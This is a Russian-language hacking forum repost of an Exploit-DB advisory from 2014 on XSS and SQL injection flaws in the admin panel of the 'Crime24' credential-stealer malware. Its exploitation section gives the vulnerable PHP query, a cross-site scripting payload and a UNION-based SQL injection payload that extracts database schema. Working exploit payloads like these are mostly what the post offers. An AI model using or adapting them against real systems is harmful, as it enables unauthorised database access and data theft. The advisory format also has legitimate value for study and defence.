Exploit Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33156
Проверка EDB
  1. Пройдено
Автор
DAISUKE DAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2014-05-03
Код: 
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#  ____        _           _          ____              
# |  _ \  __ _(_)___ _   _| | _____  |  _ \  __ _ _ __   
# | | | |/ _` | / __| | | | |/ / _ \ | | | |/ _` | '_ \  
# | |_| | (_| | \__ \ |_| |   <  __/ | |_| | (_| | | | |
# |____/ \__,_|_|___/\__,_|_|\_\___| |____/ \__,_|_| |_|
#        
#     #CyberNinja | My katana can slay any security!
#         >> Twitter @TheHackersBay
#             >> Pentester / Underground hacker
#
# Exploit Title: Crime24 Stealer Panel <= Multiple Vulnerabilities
# Date: Sunday May 3 2014
# Exploit Author: Daisuke Dan
# Vendor Homepage: Crime24.net
# Version: v.1
# Tested on: Windows Seven
# Blog post: http://thehackersbay.org/blog/2014/05/03/crime24-stealer-panel/
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

An attacker can execute an XSS and inject sql commands in the search form.
You must be logged in the admin panel.

#=========================== EXPLOITATION ==============================

0x01 Detecting the error

POST: http://site.com/?action=search
POST Content: q='"><img+src=x+onerror=prompt('DaisukeDan');>&in=1&search=Search
Example: http://i.imgur.com/zyIr5xv.png
Result: Cross site scripting + SQL error


0x02 Exploit the SQL Injection

[+] Vulnerable code:
$result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);

POST: http://site.com/?action=search			
POST Content:
q=' union select 1,2,group_concat(column_name,0x0a),4,5,6,7,8 from information_schema.columns where table_name=0x6c6f6773-- -
&in=1&search=Search
Example: http://i.imgur.com/t4ydLsR.png
You have access to all the database.


#=========================== Gr33tz =============================#
| Raw-x | eth0 | Downfall | XzLt | Insider | rootaccess | Yasker |
| EZiX | Negative | ajkaro | Un0wn_X | H4T | NeTwork | Pent0thal |
#================================================================#
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Whatsapp Forensic/Stealer (Android) PoC Paper
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy File Sharing Web Server 4 - Remote Information Stealer
Ответы
0
Просмотры
311
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service
Ответы
0
Просмотры
289
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)
Ответы
0
Просмотры
275
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)
Ответы
0
Просмотры
636
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Exchange Control Panel - Viewstate Deserialization (Metasploit)
Ответы
0
Просмотры
740
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit FusionPBX - Operator Panel exec.php Command Execution (Metasploit)
Ответы
0
Просмотры
679
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Techno Portfolio Management Panel - 'id' SQL Injection
Ответы
0
Просмотры
715
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
Ответы
0
Просмотры
597
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Seo Panel - 'file' Directory Traversal
Ответы
0
Просмотры
465
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу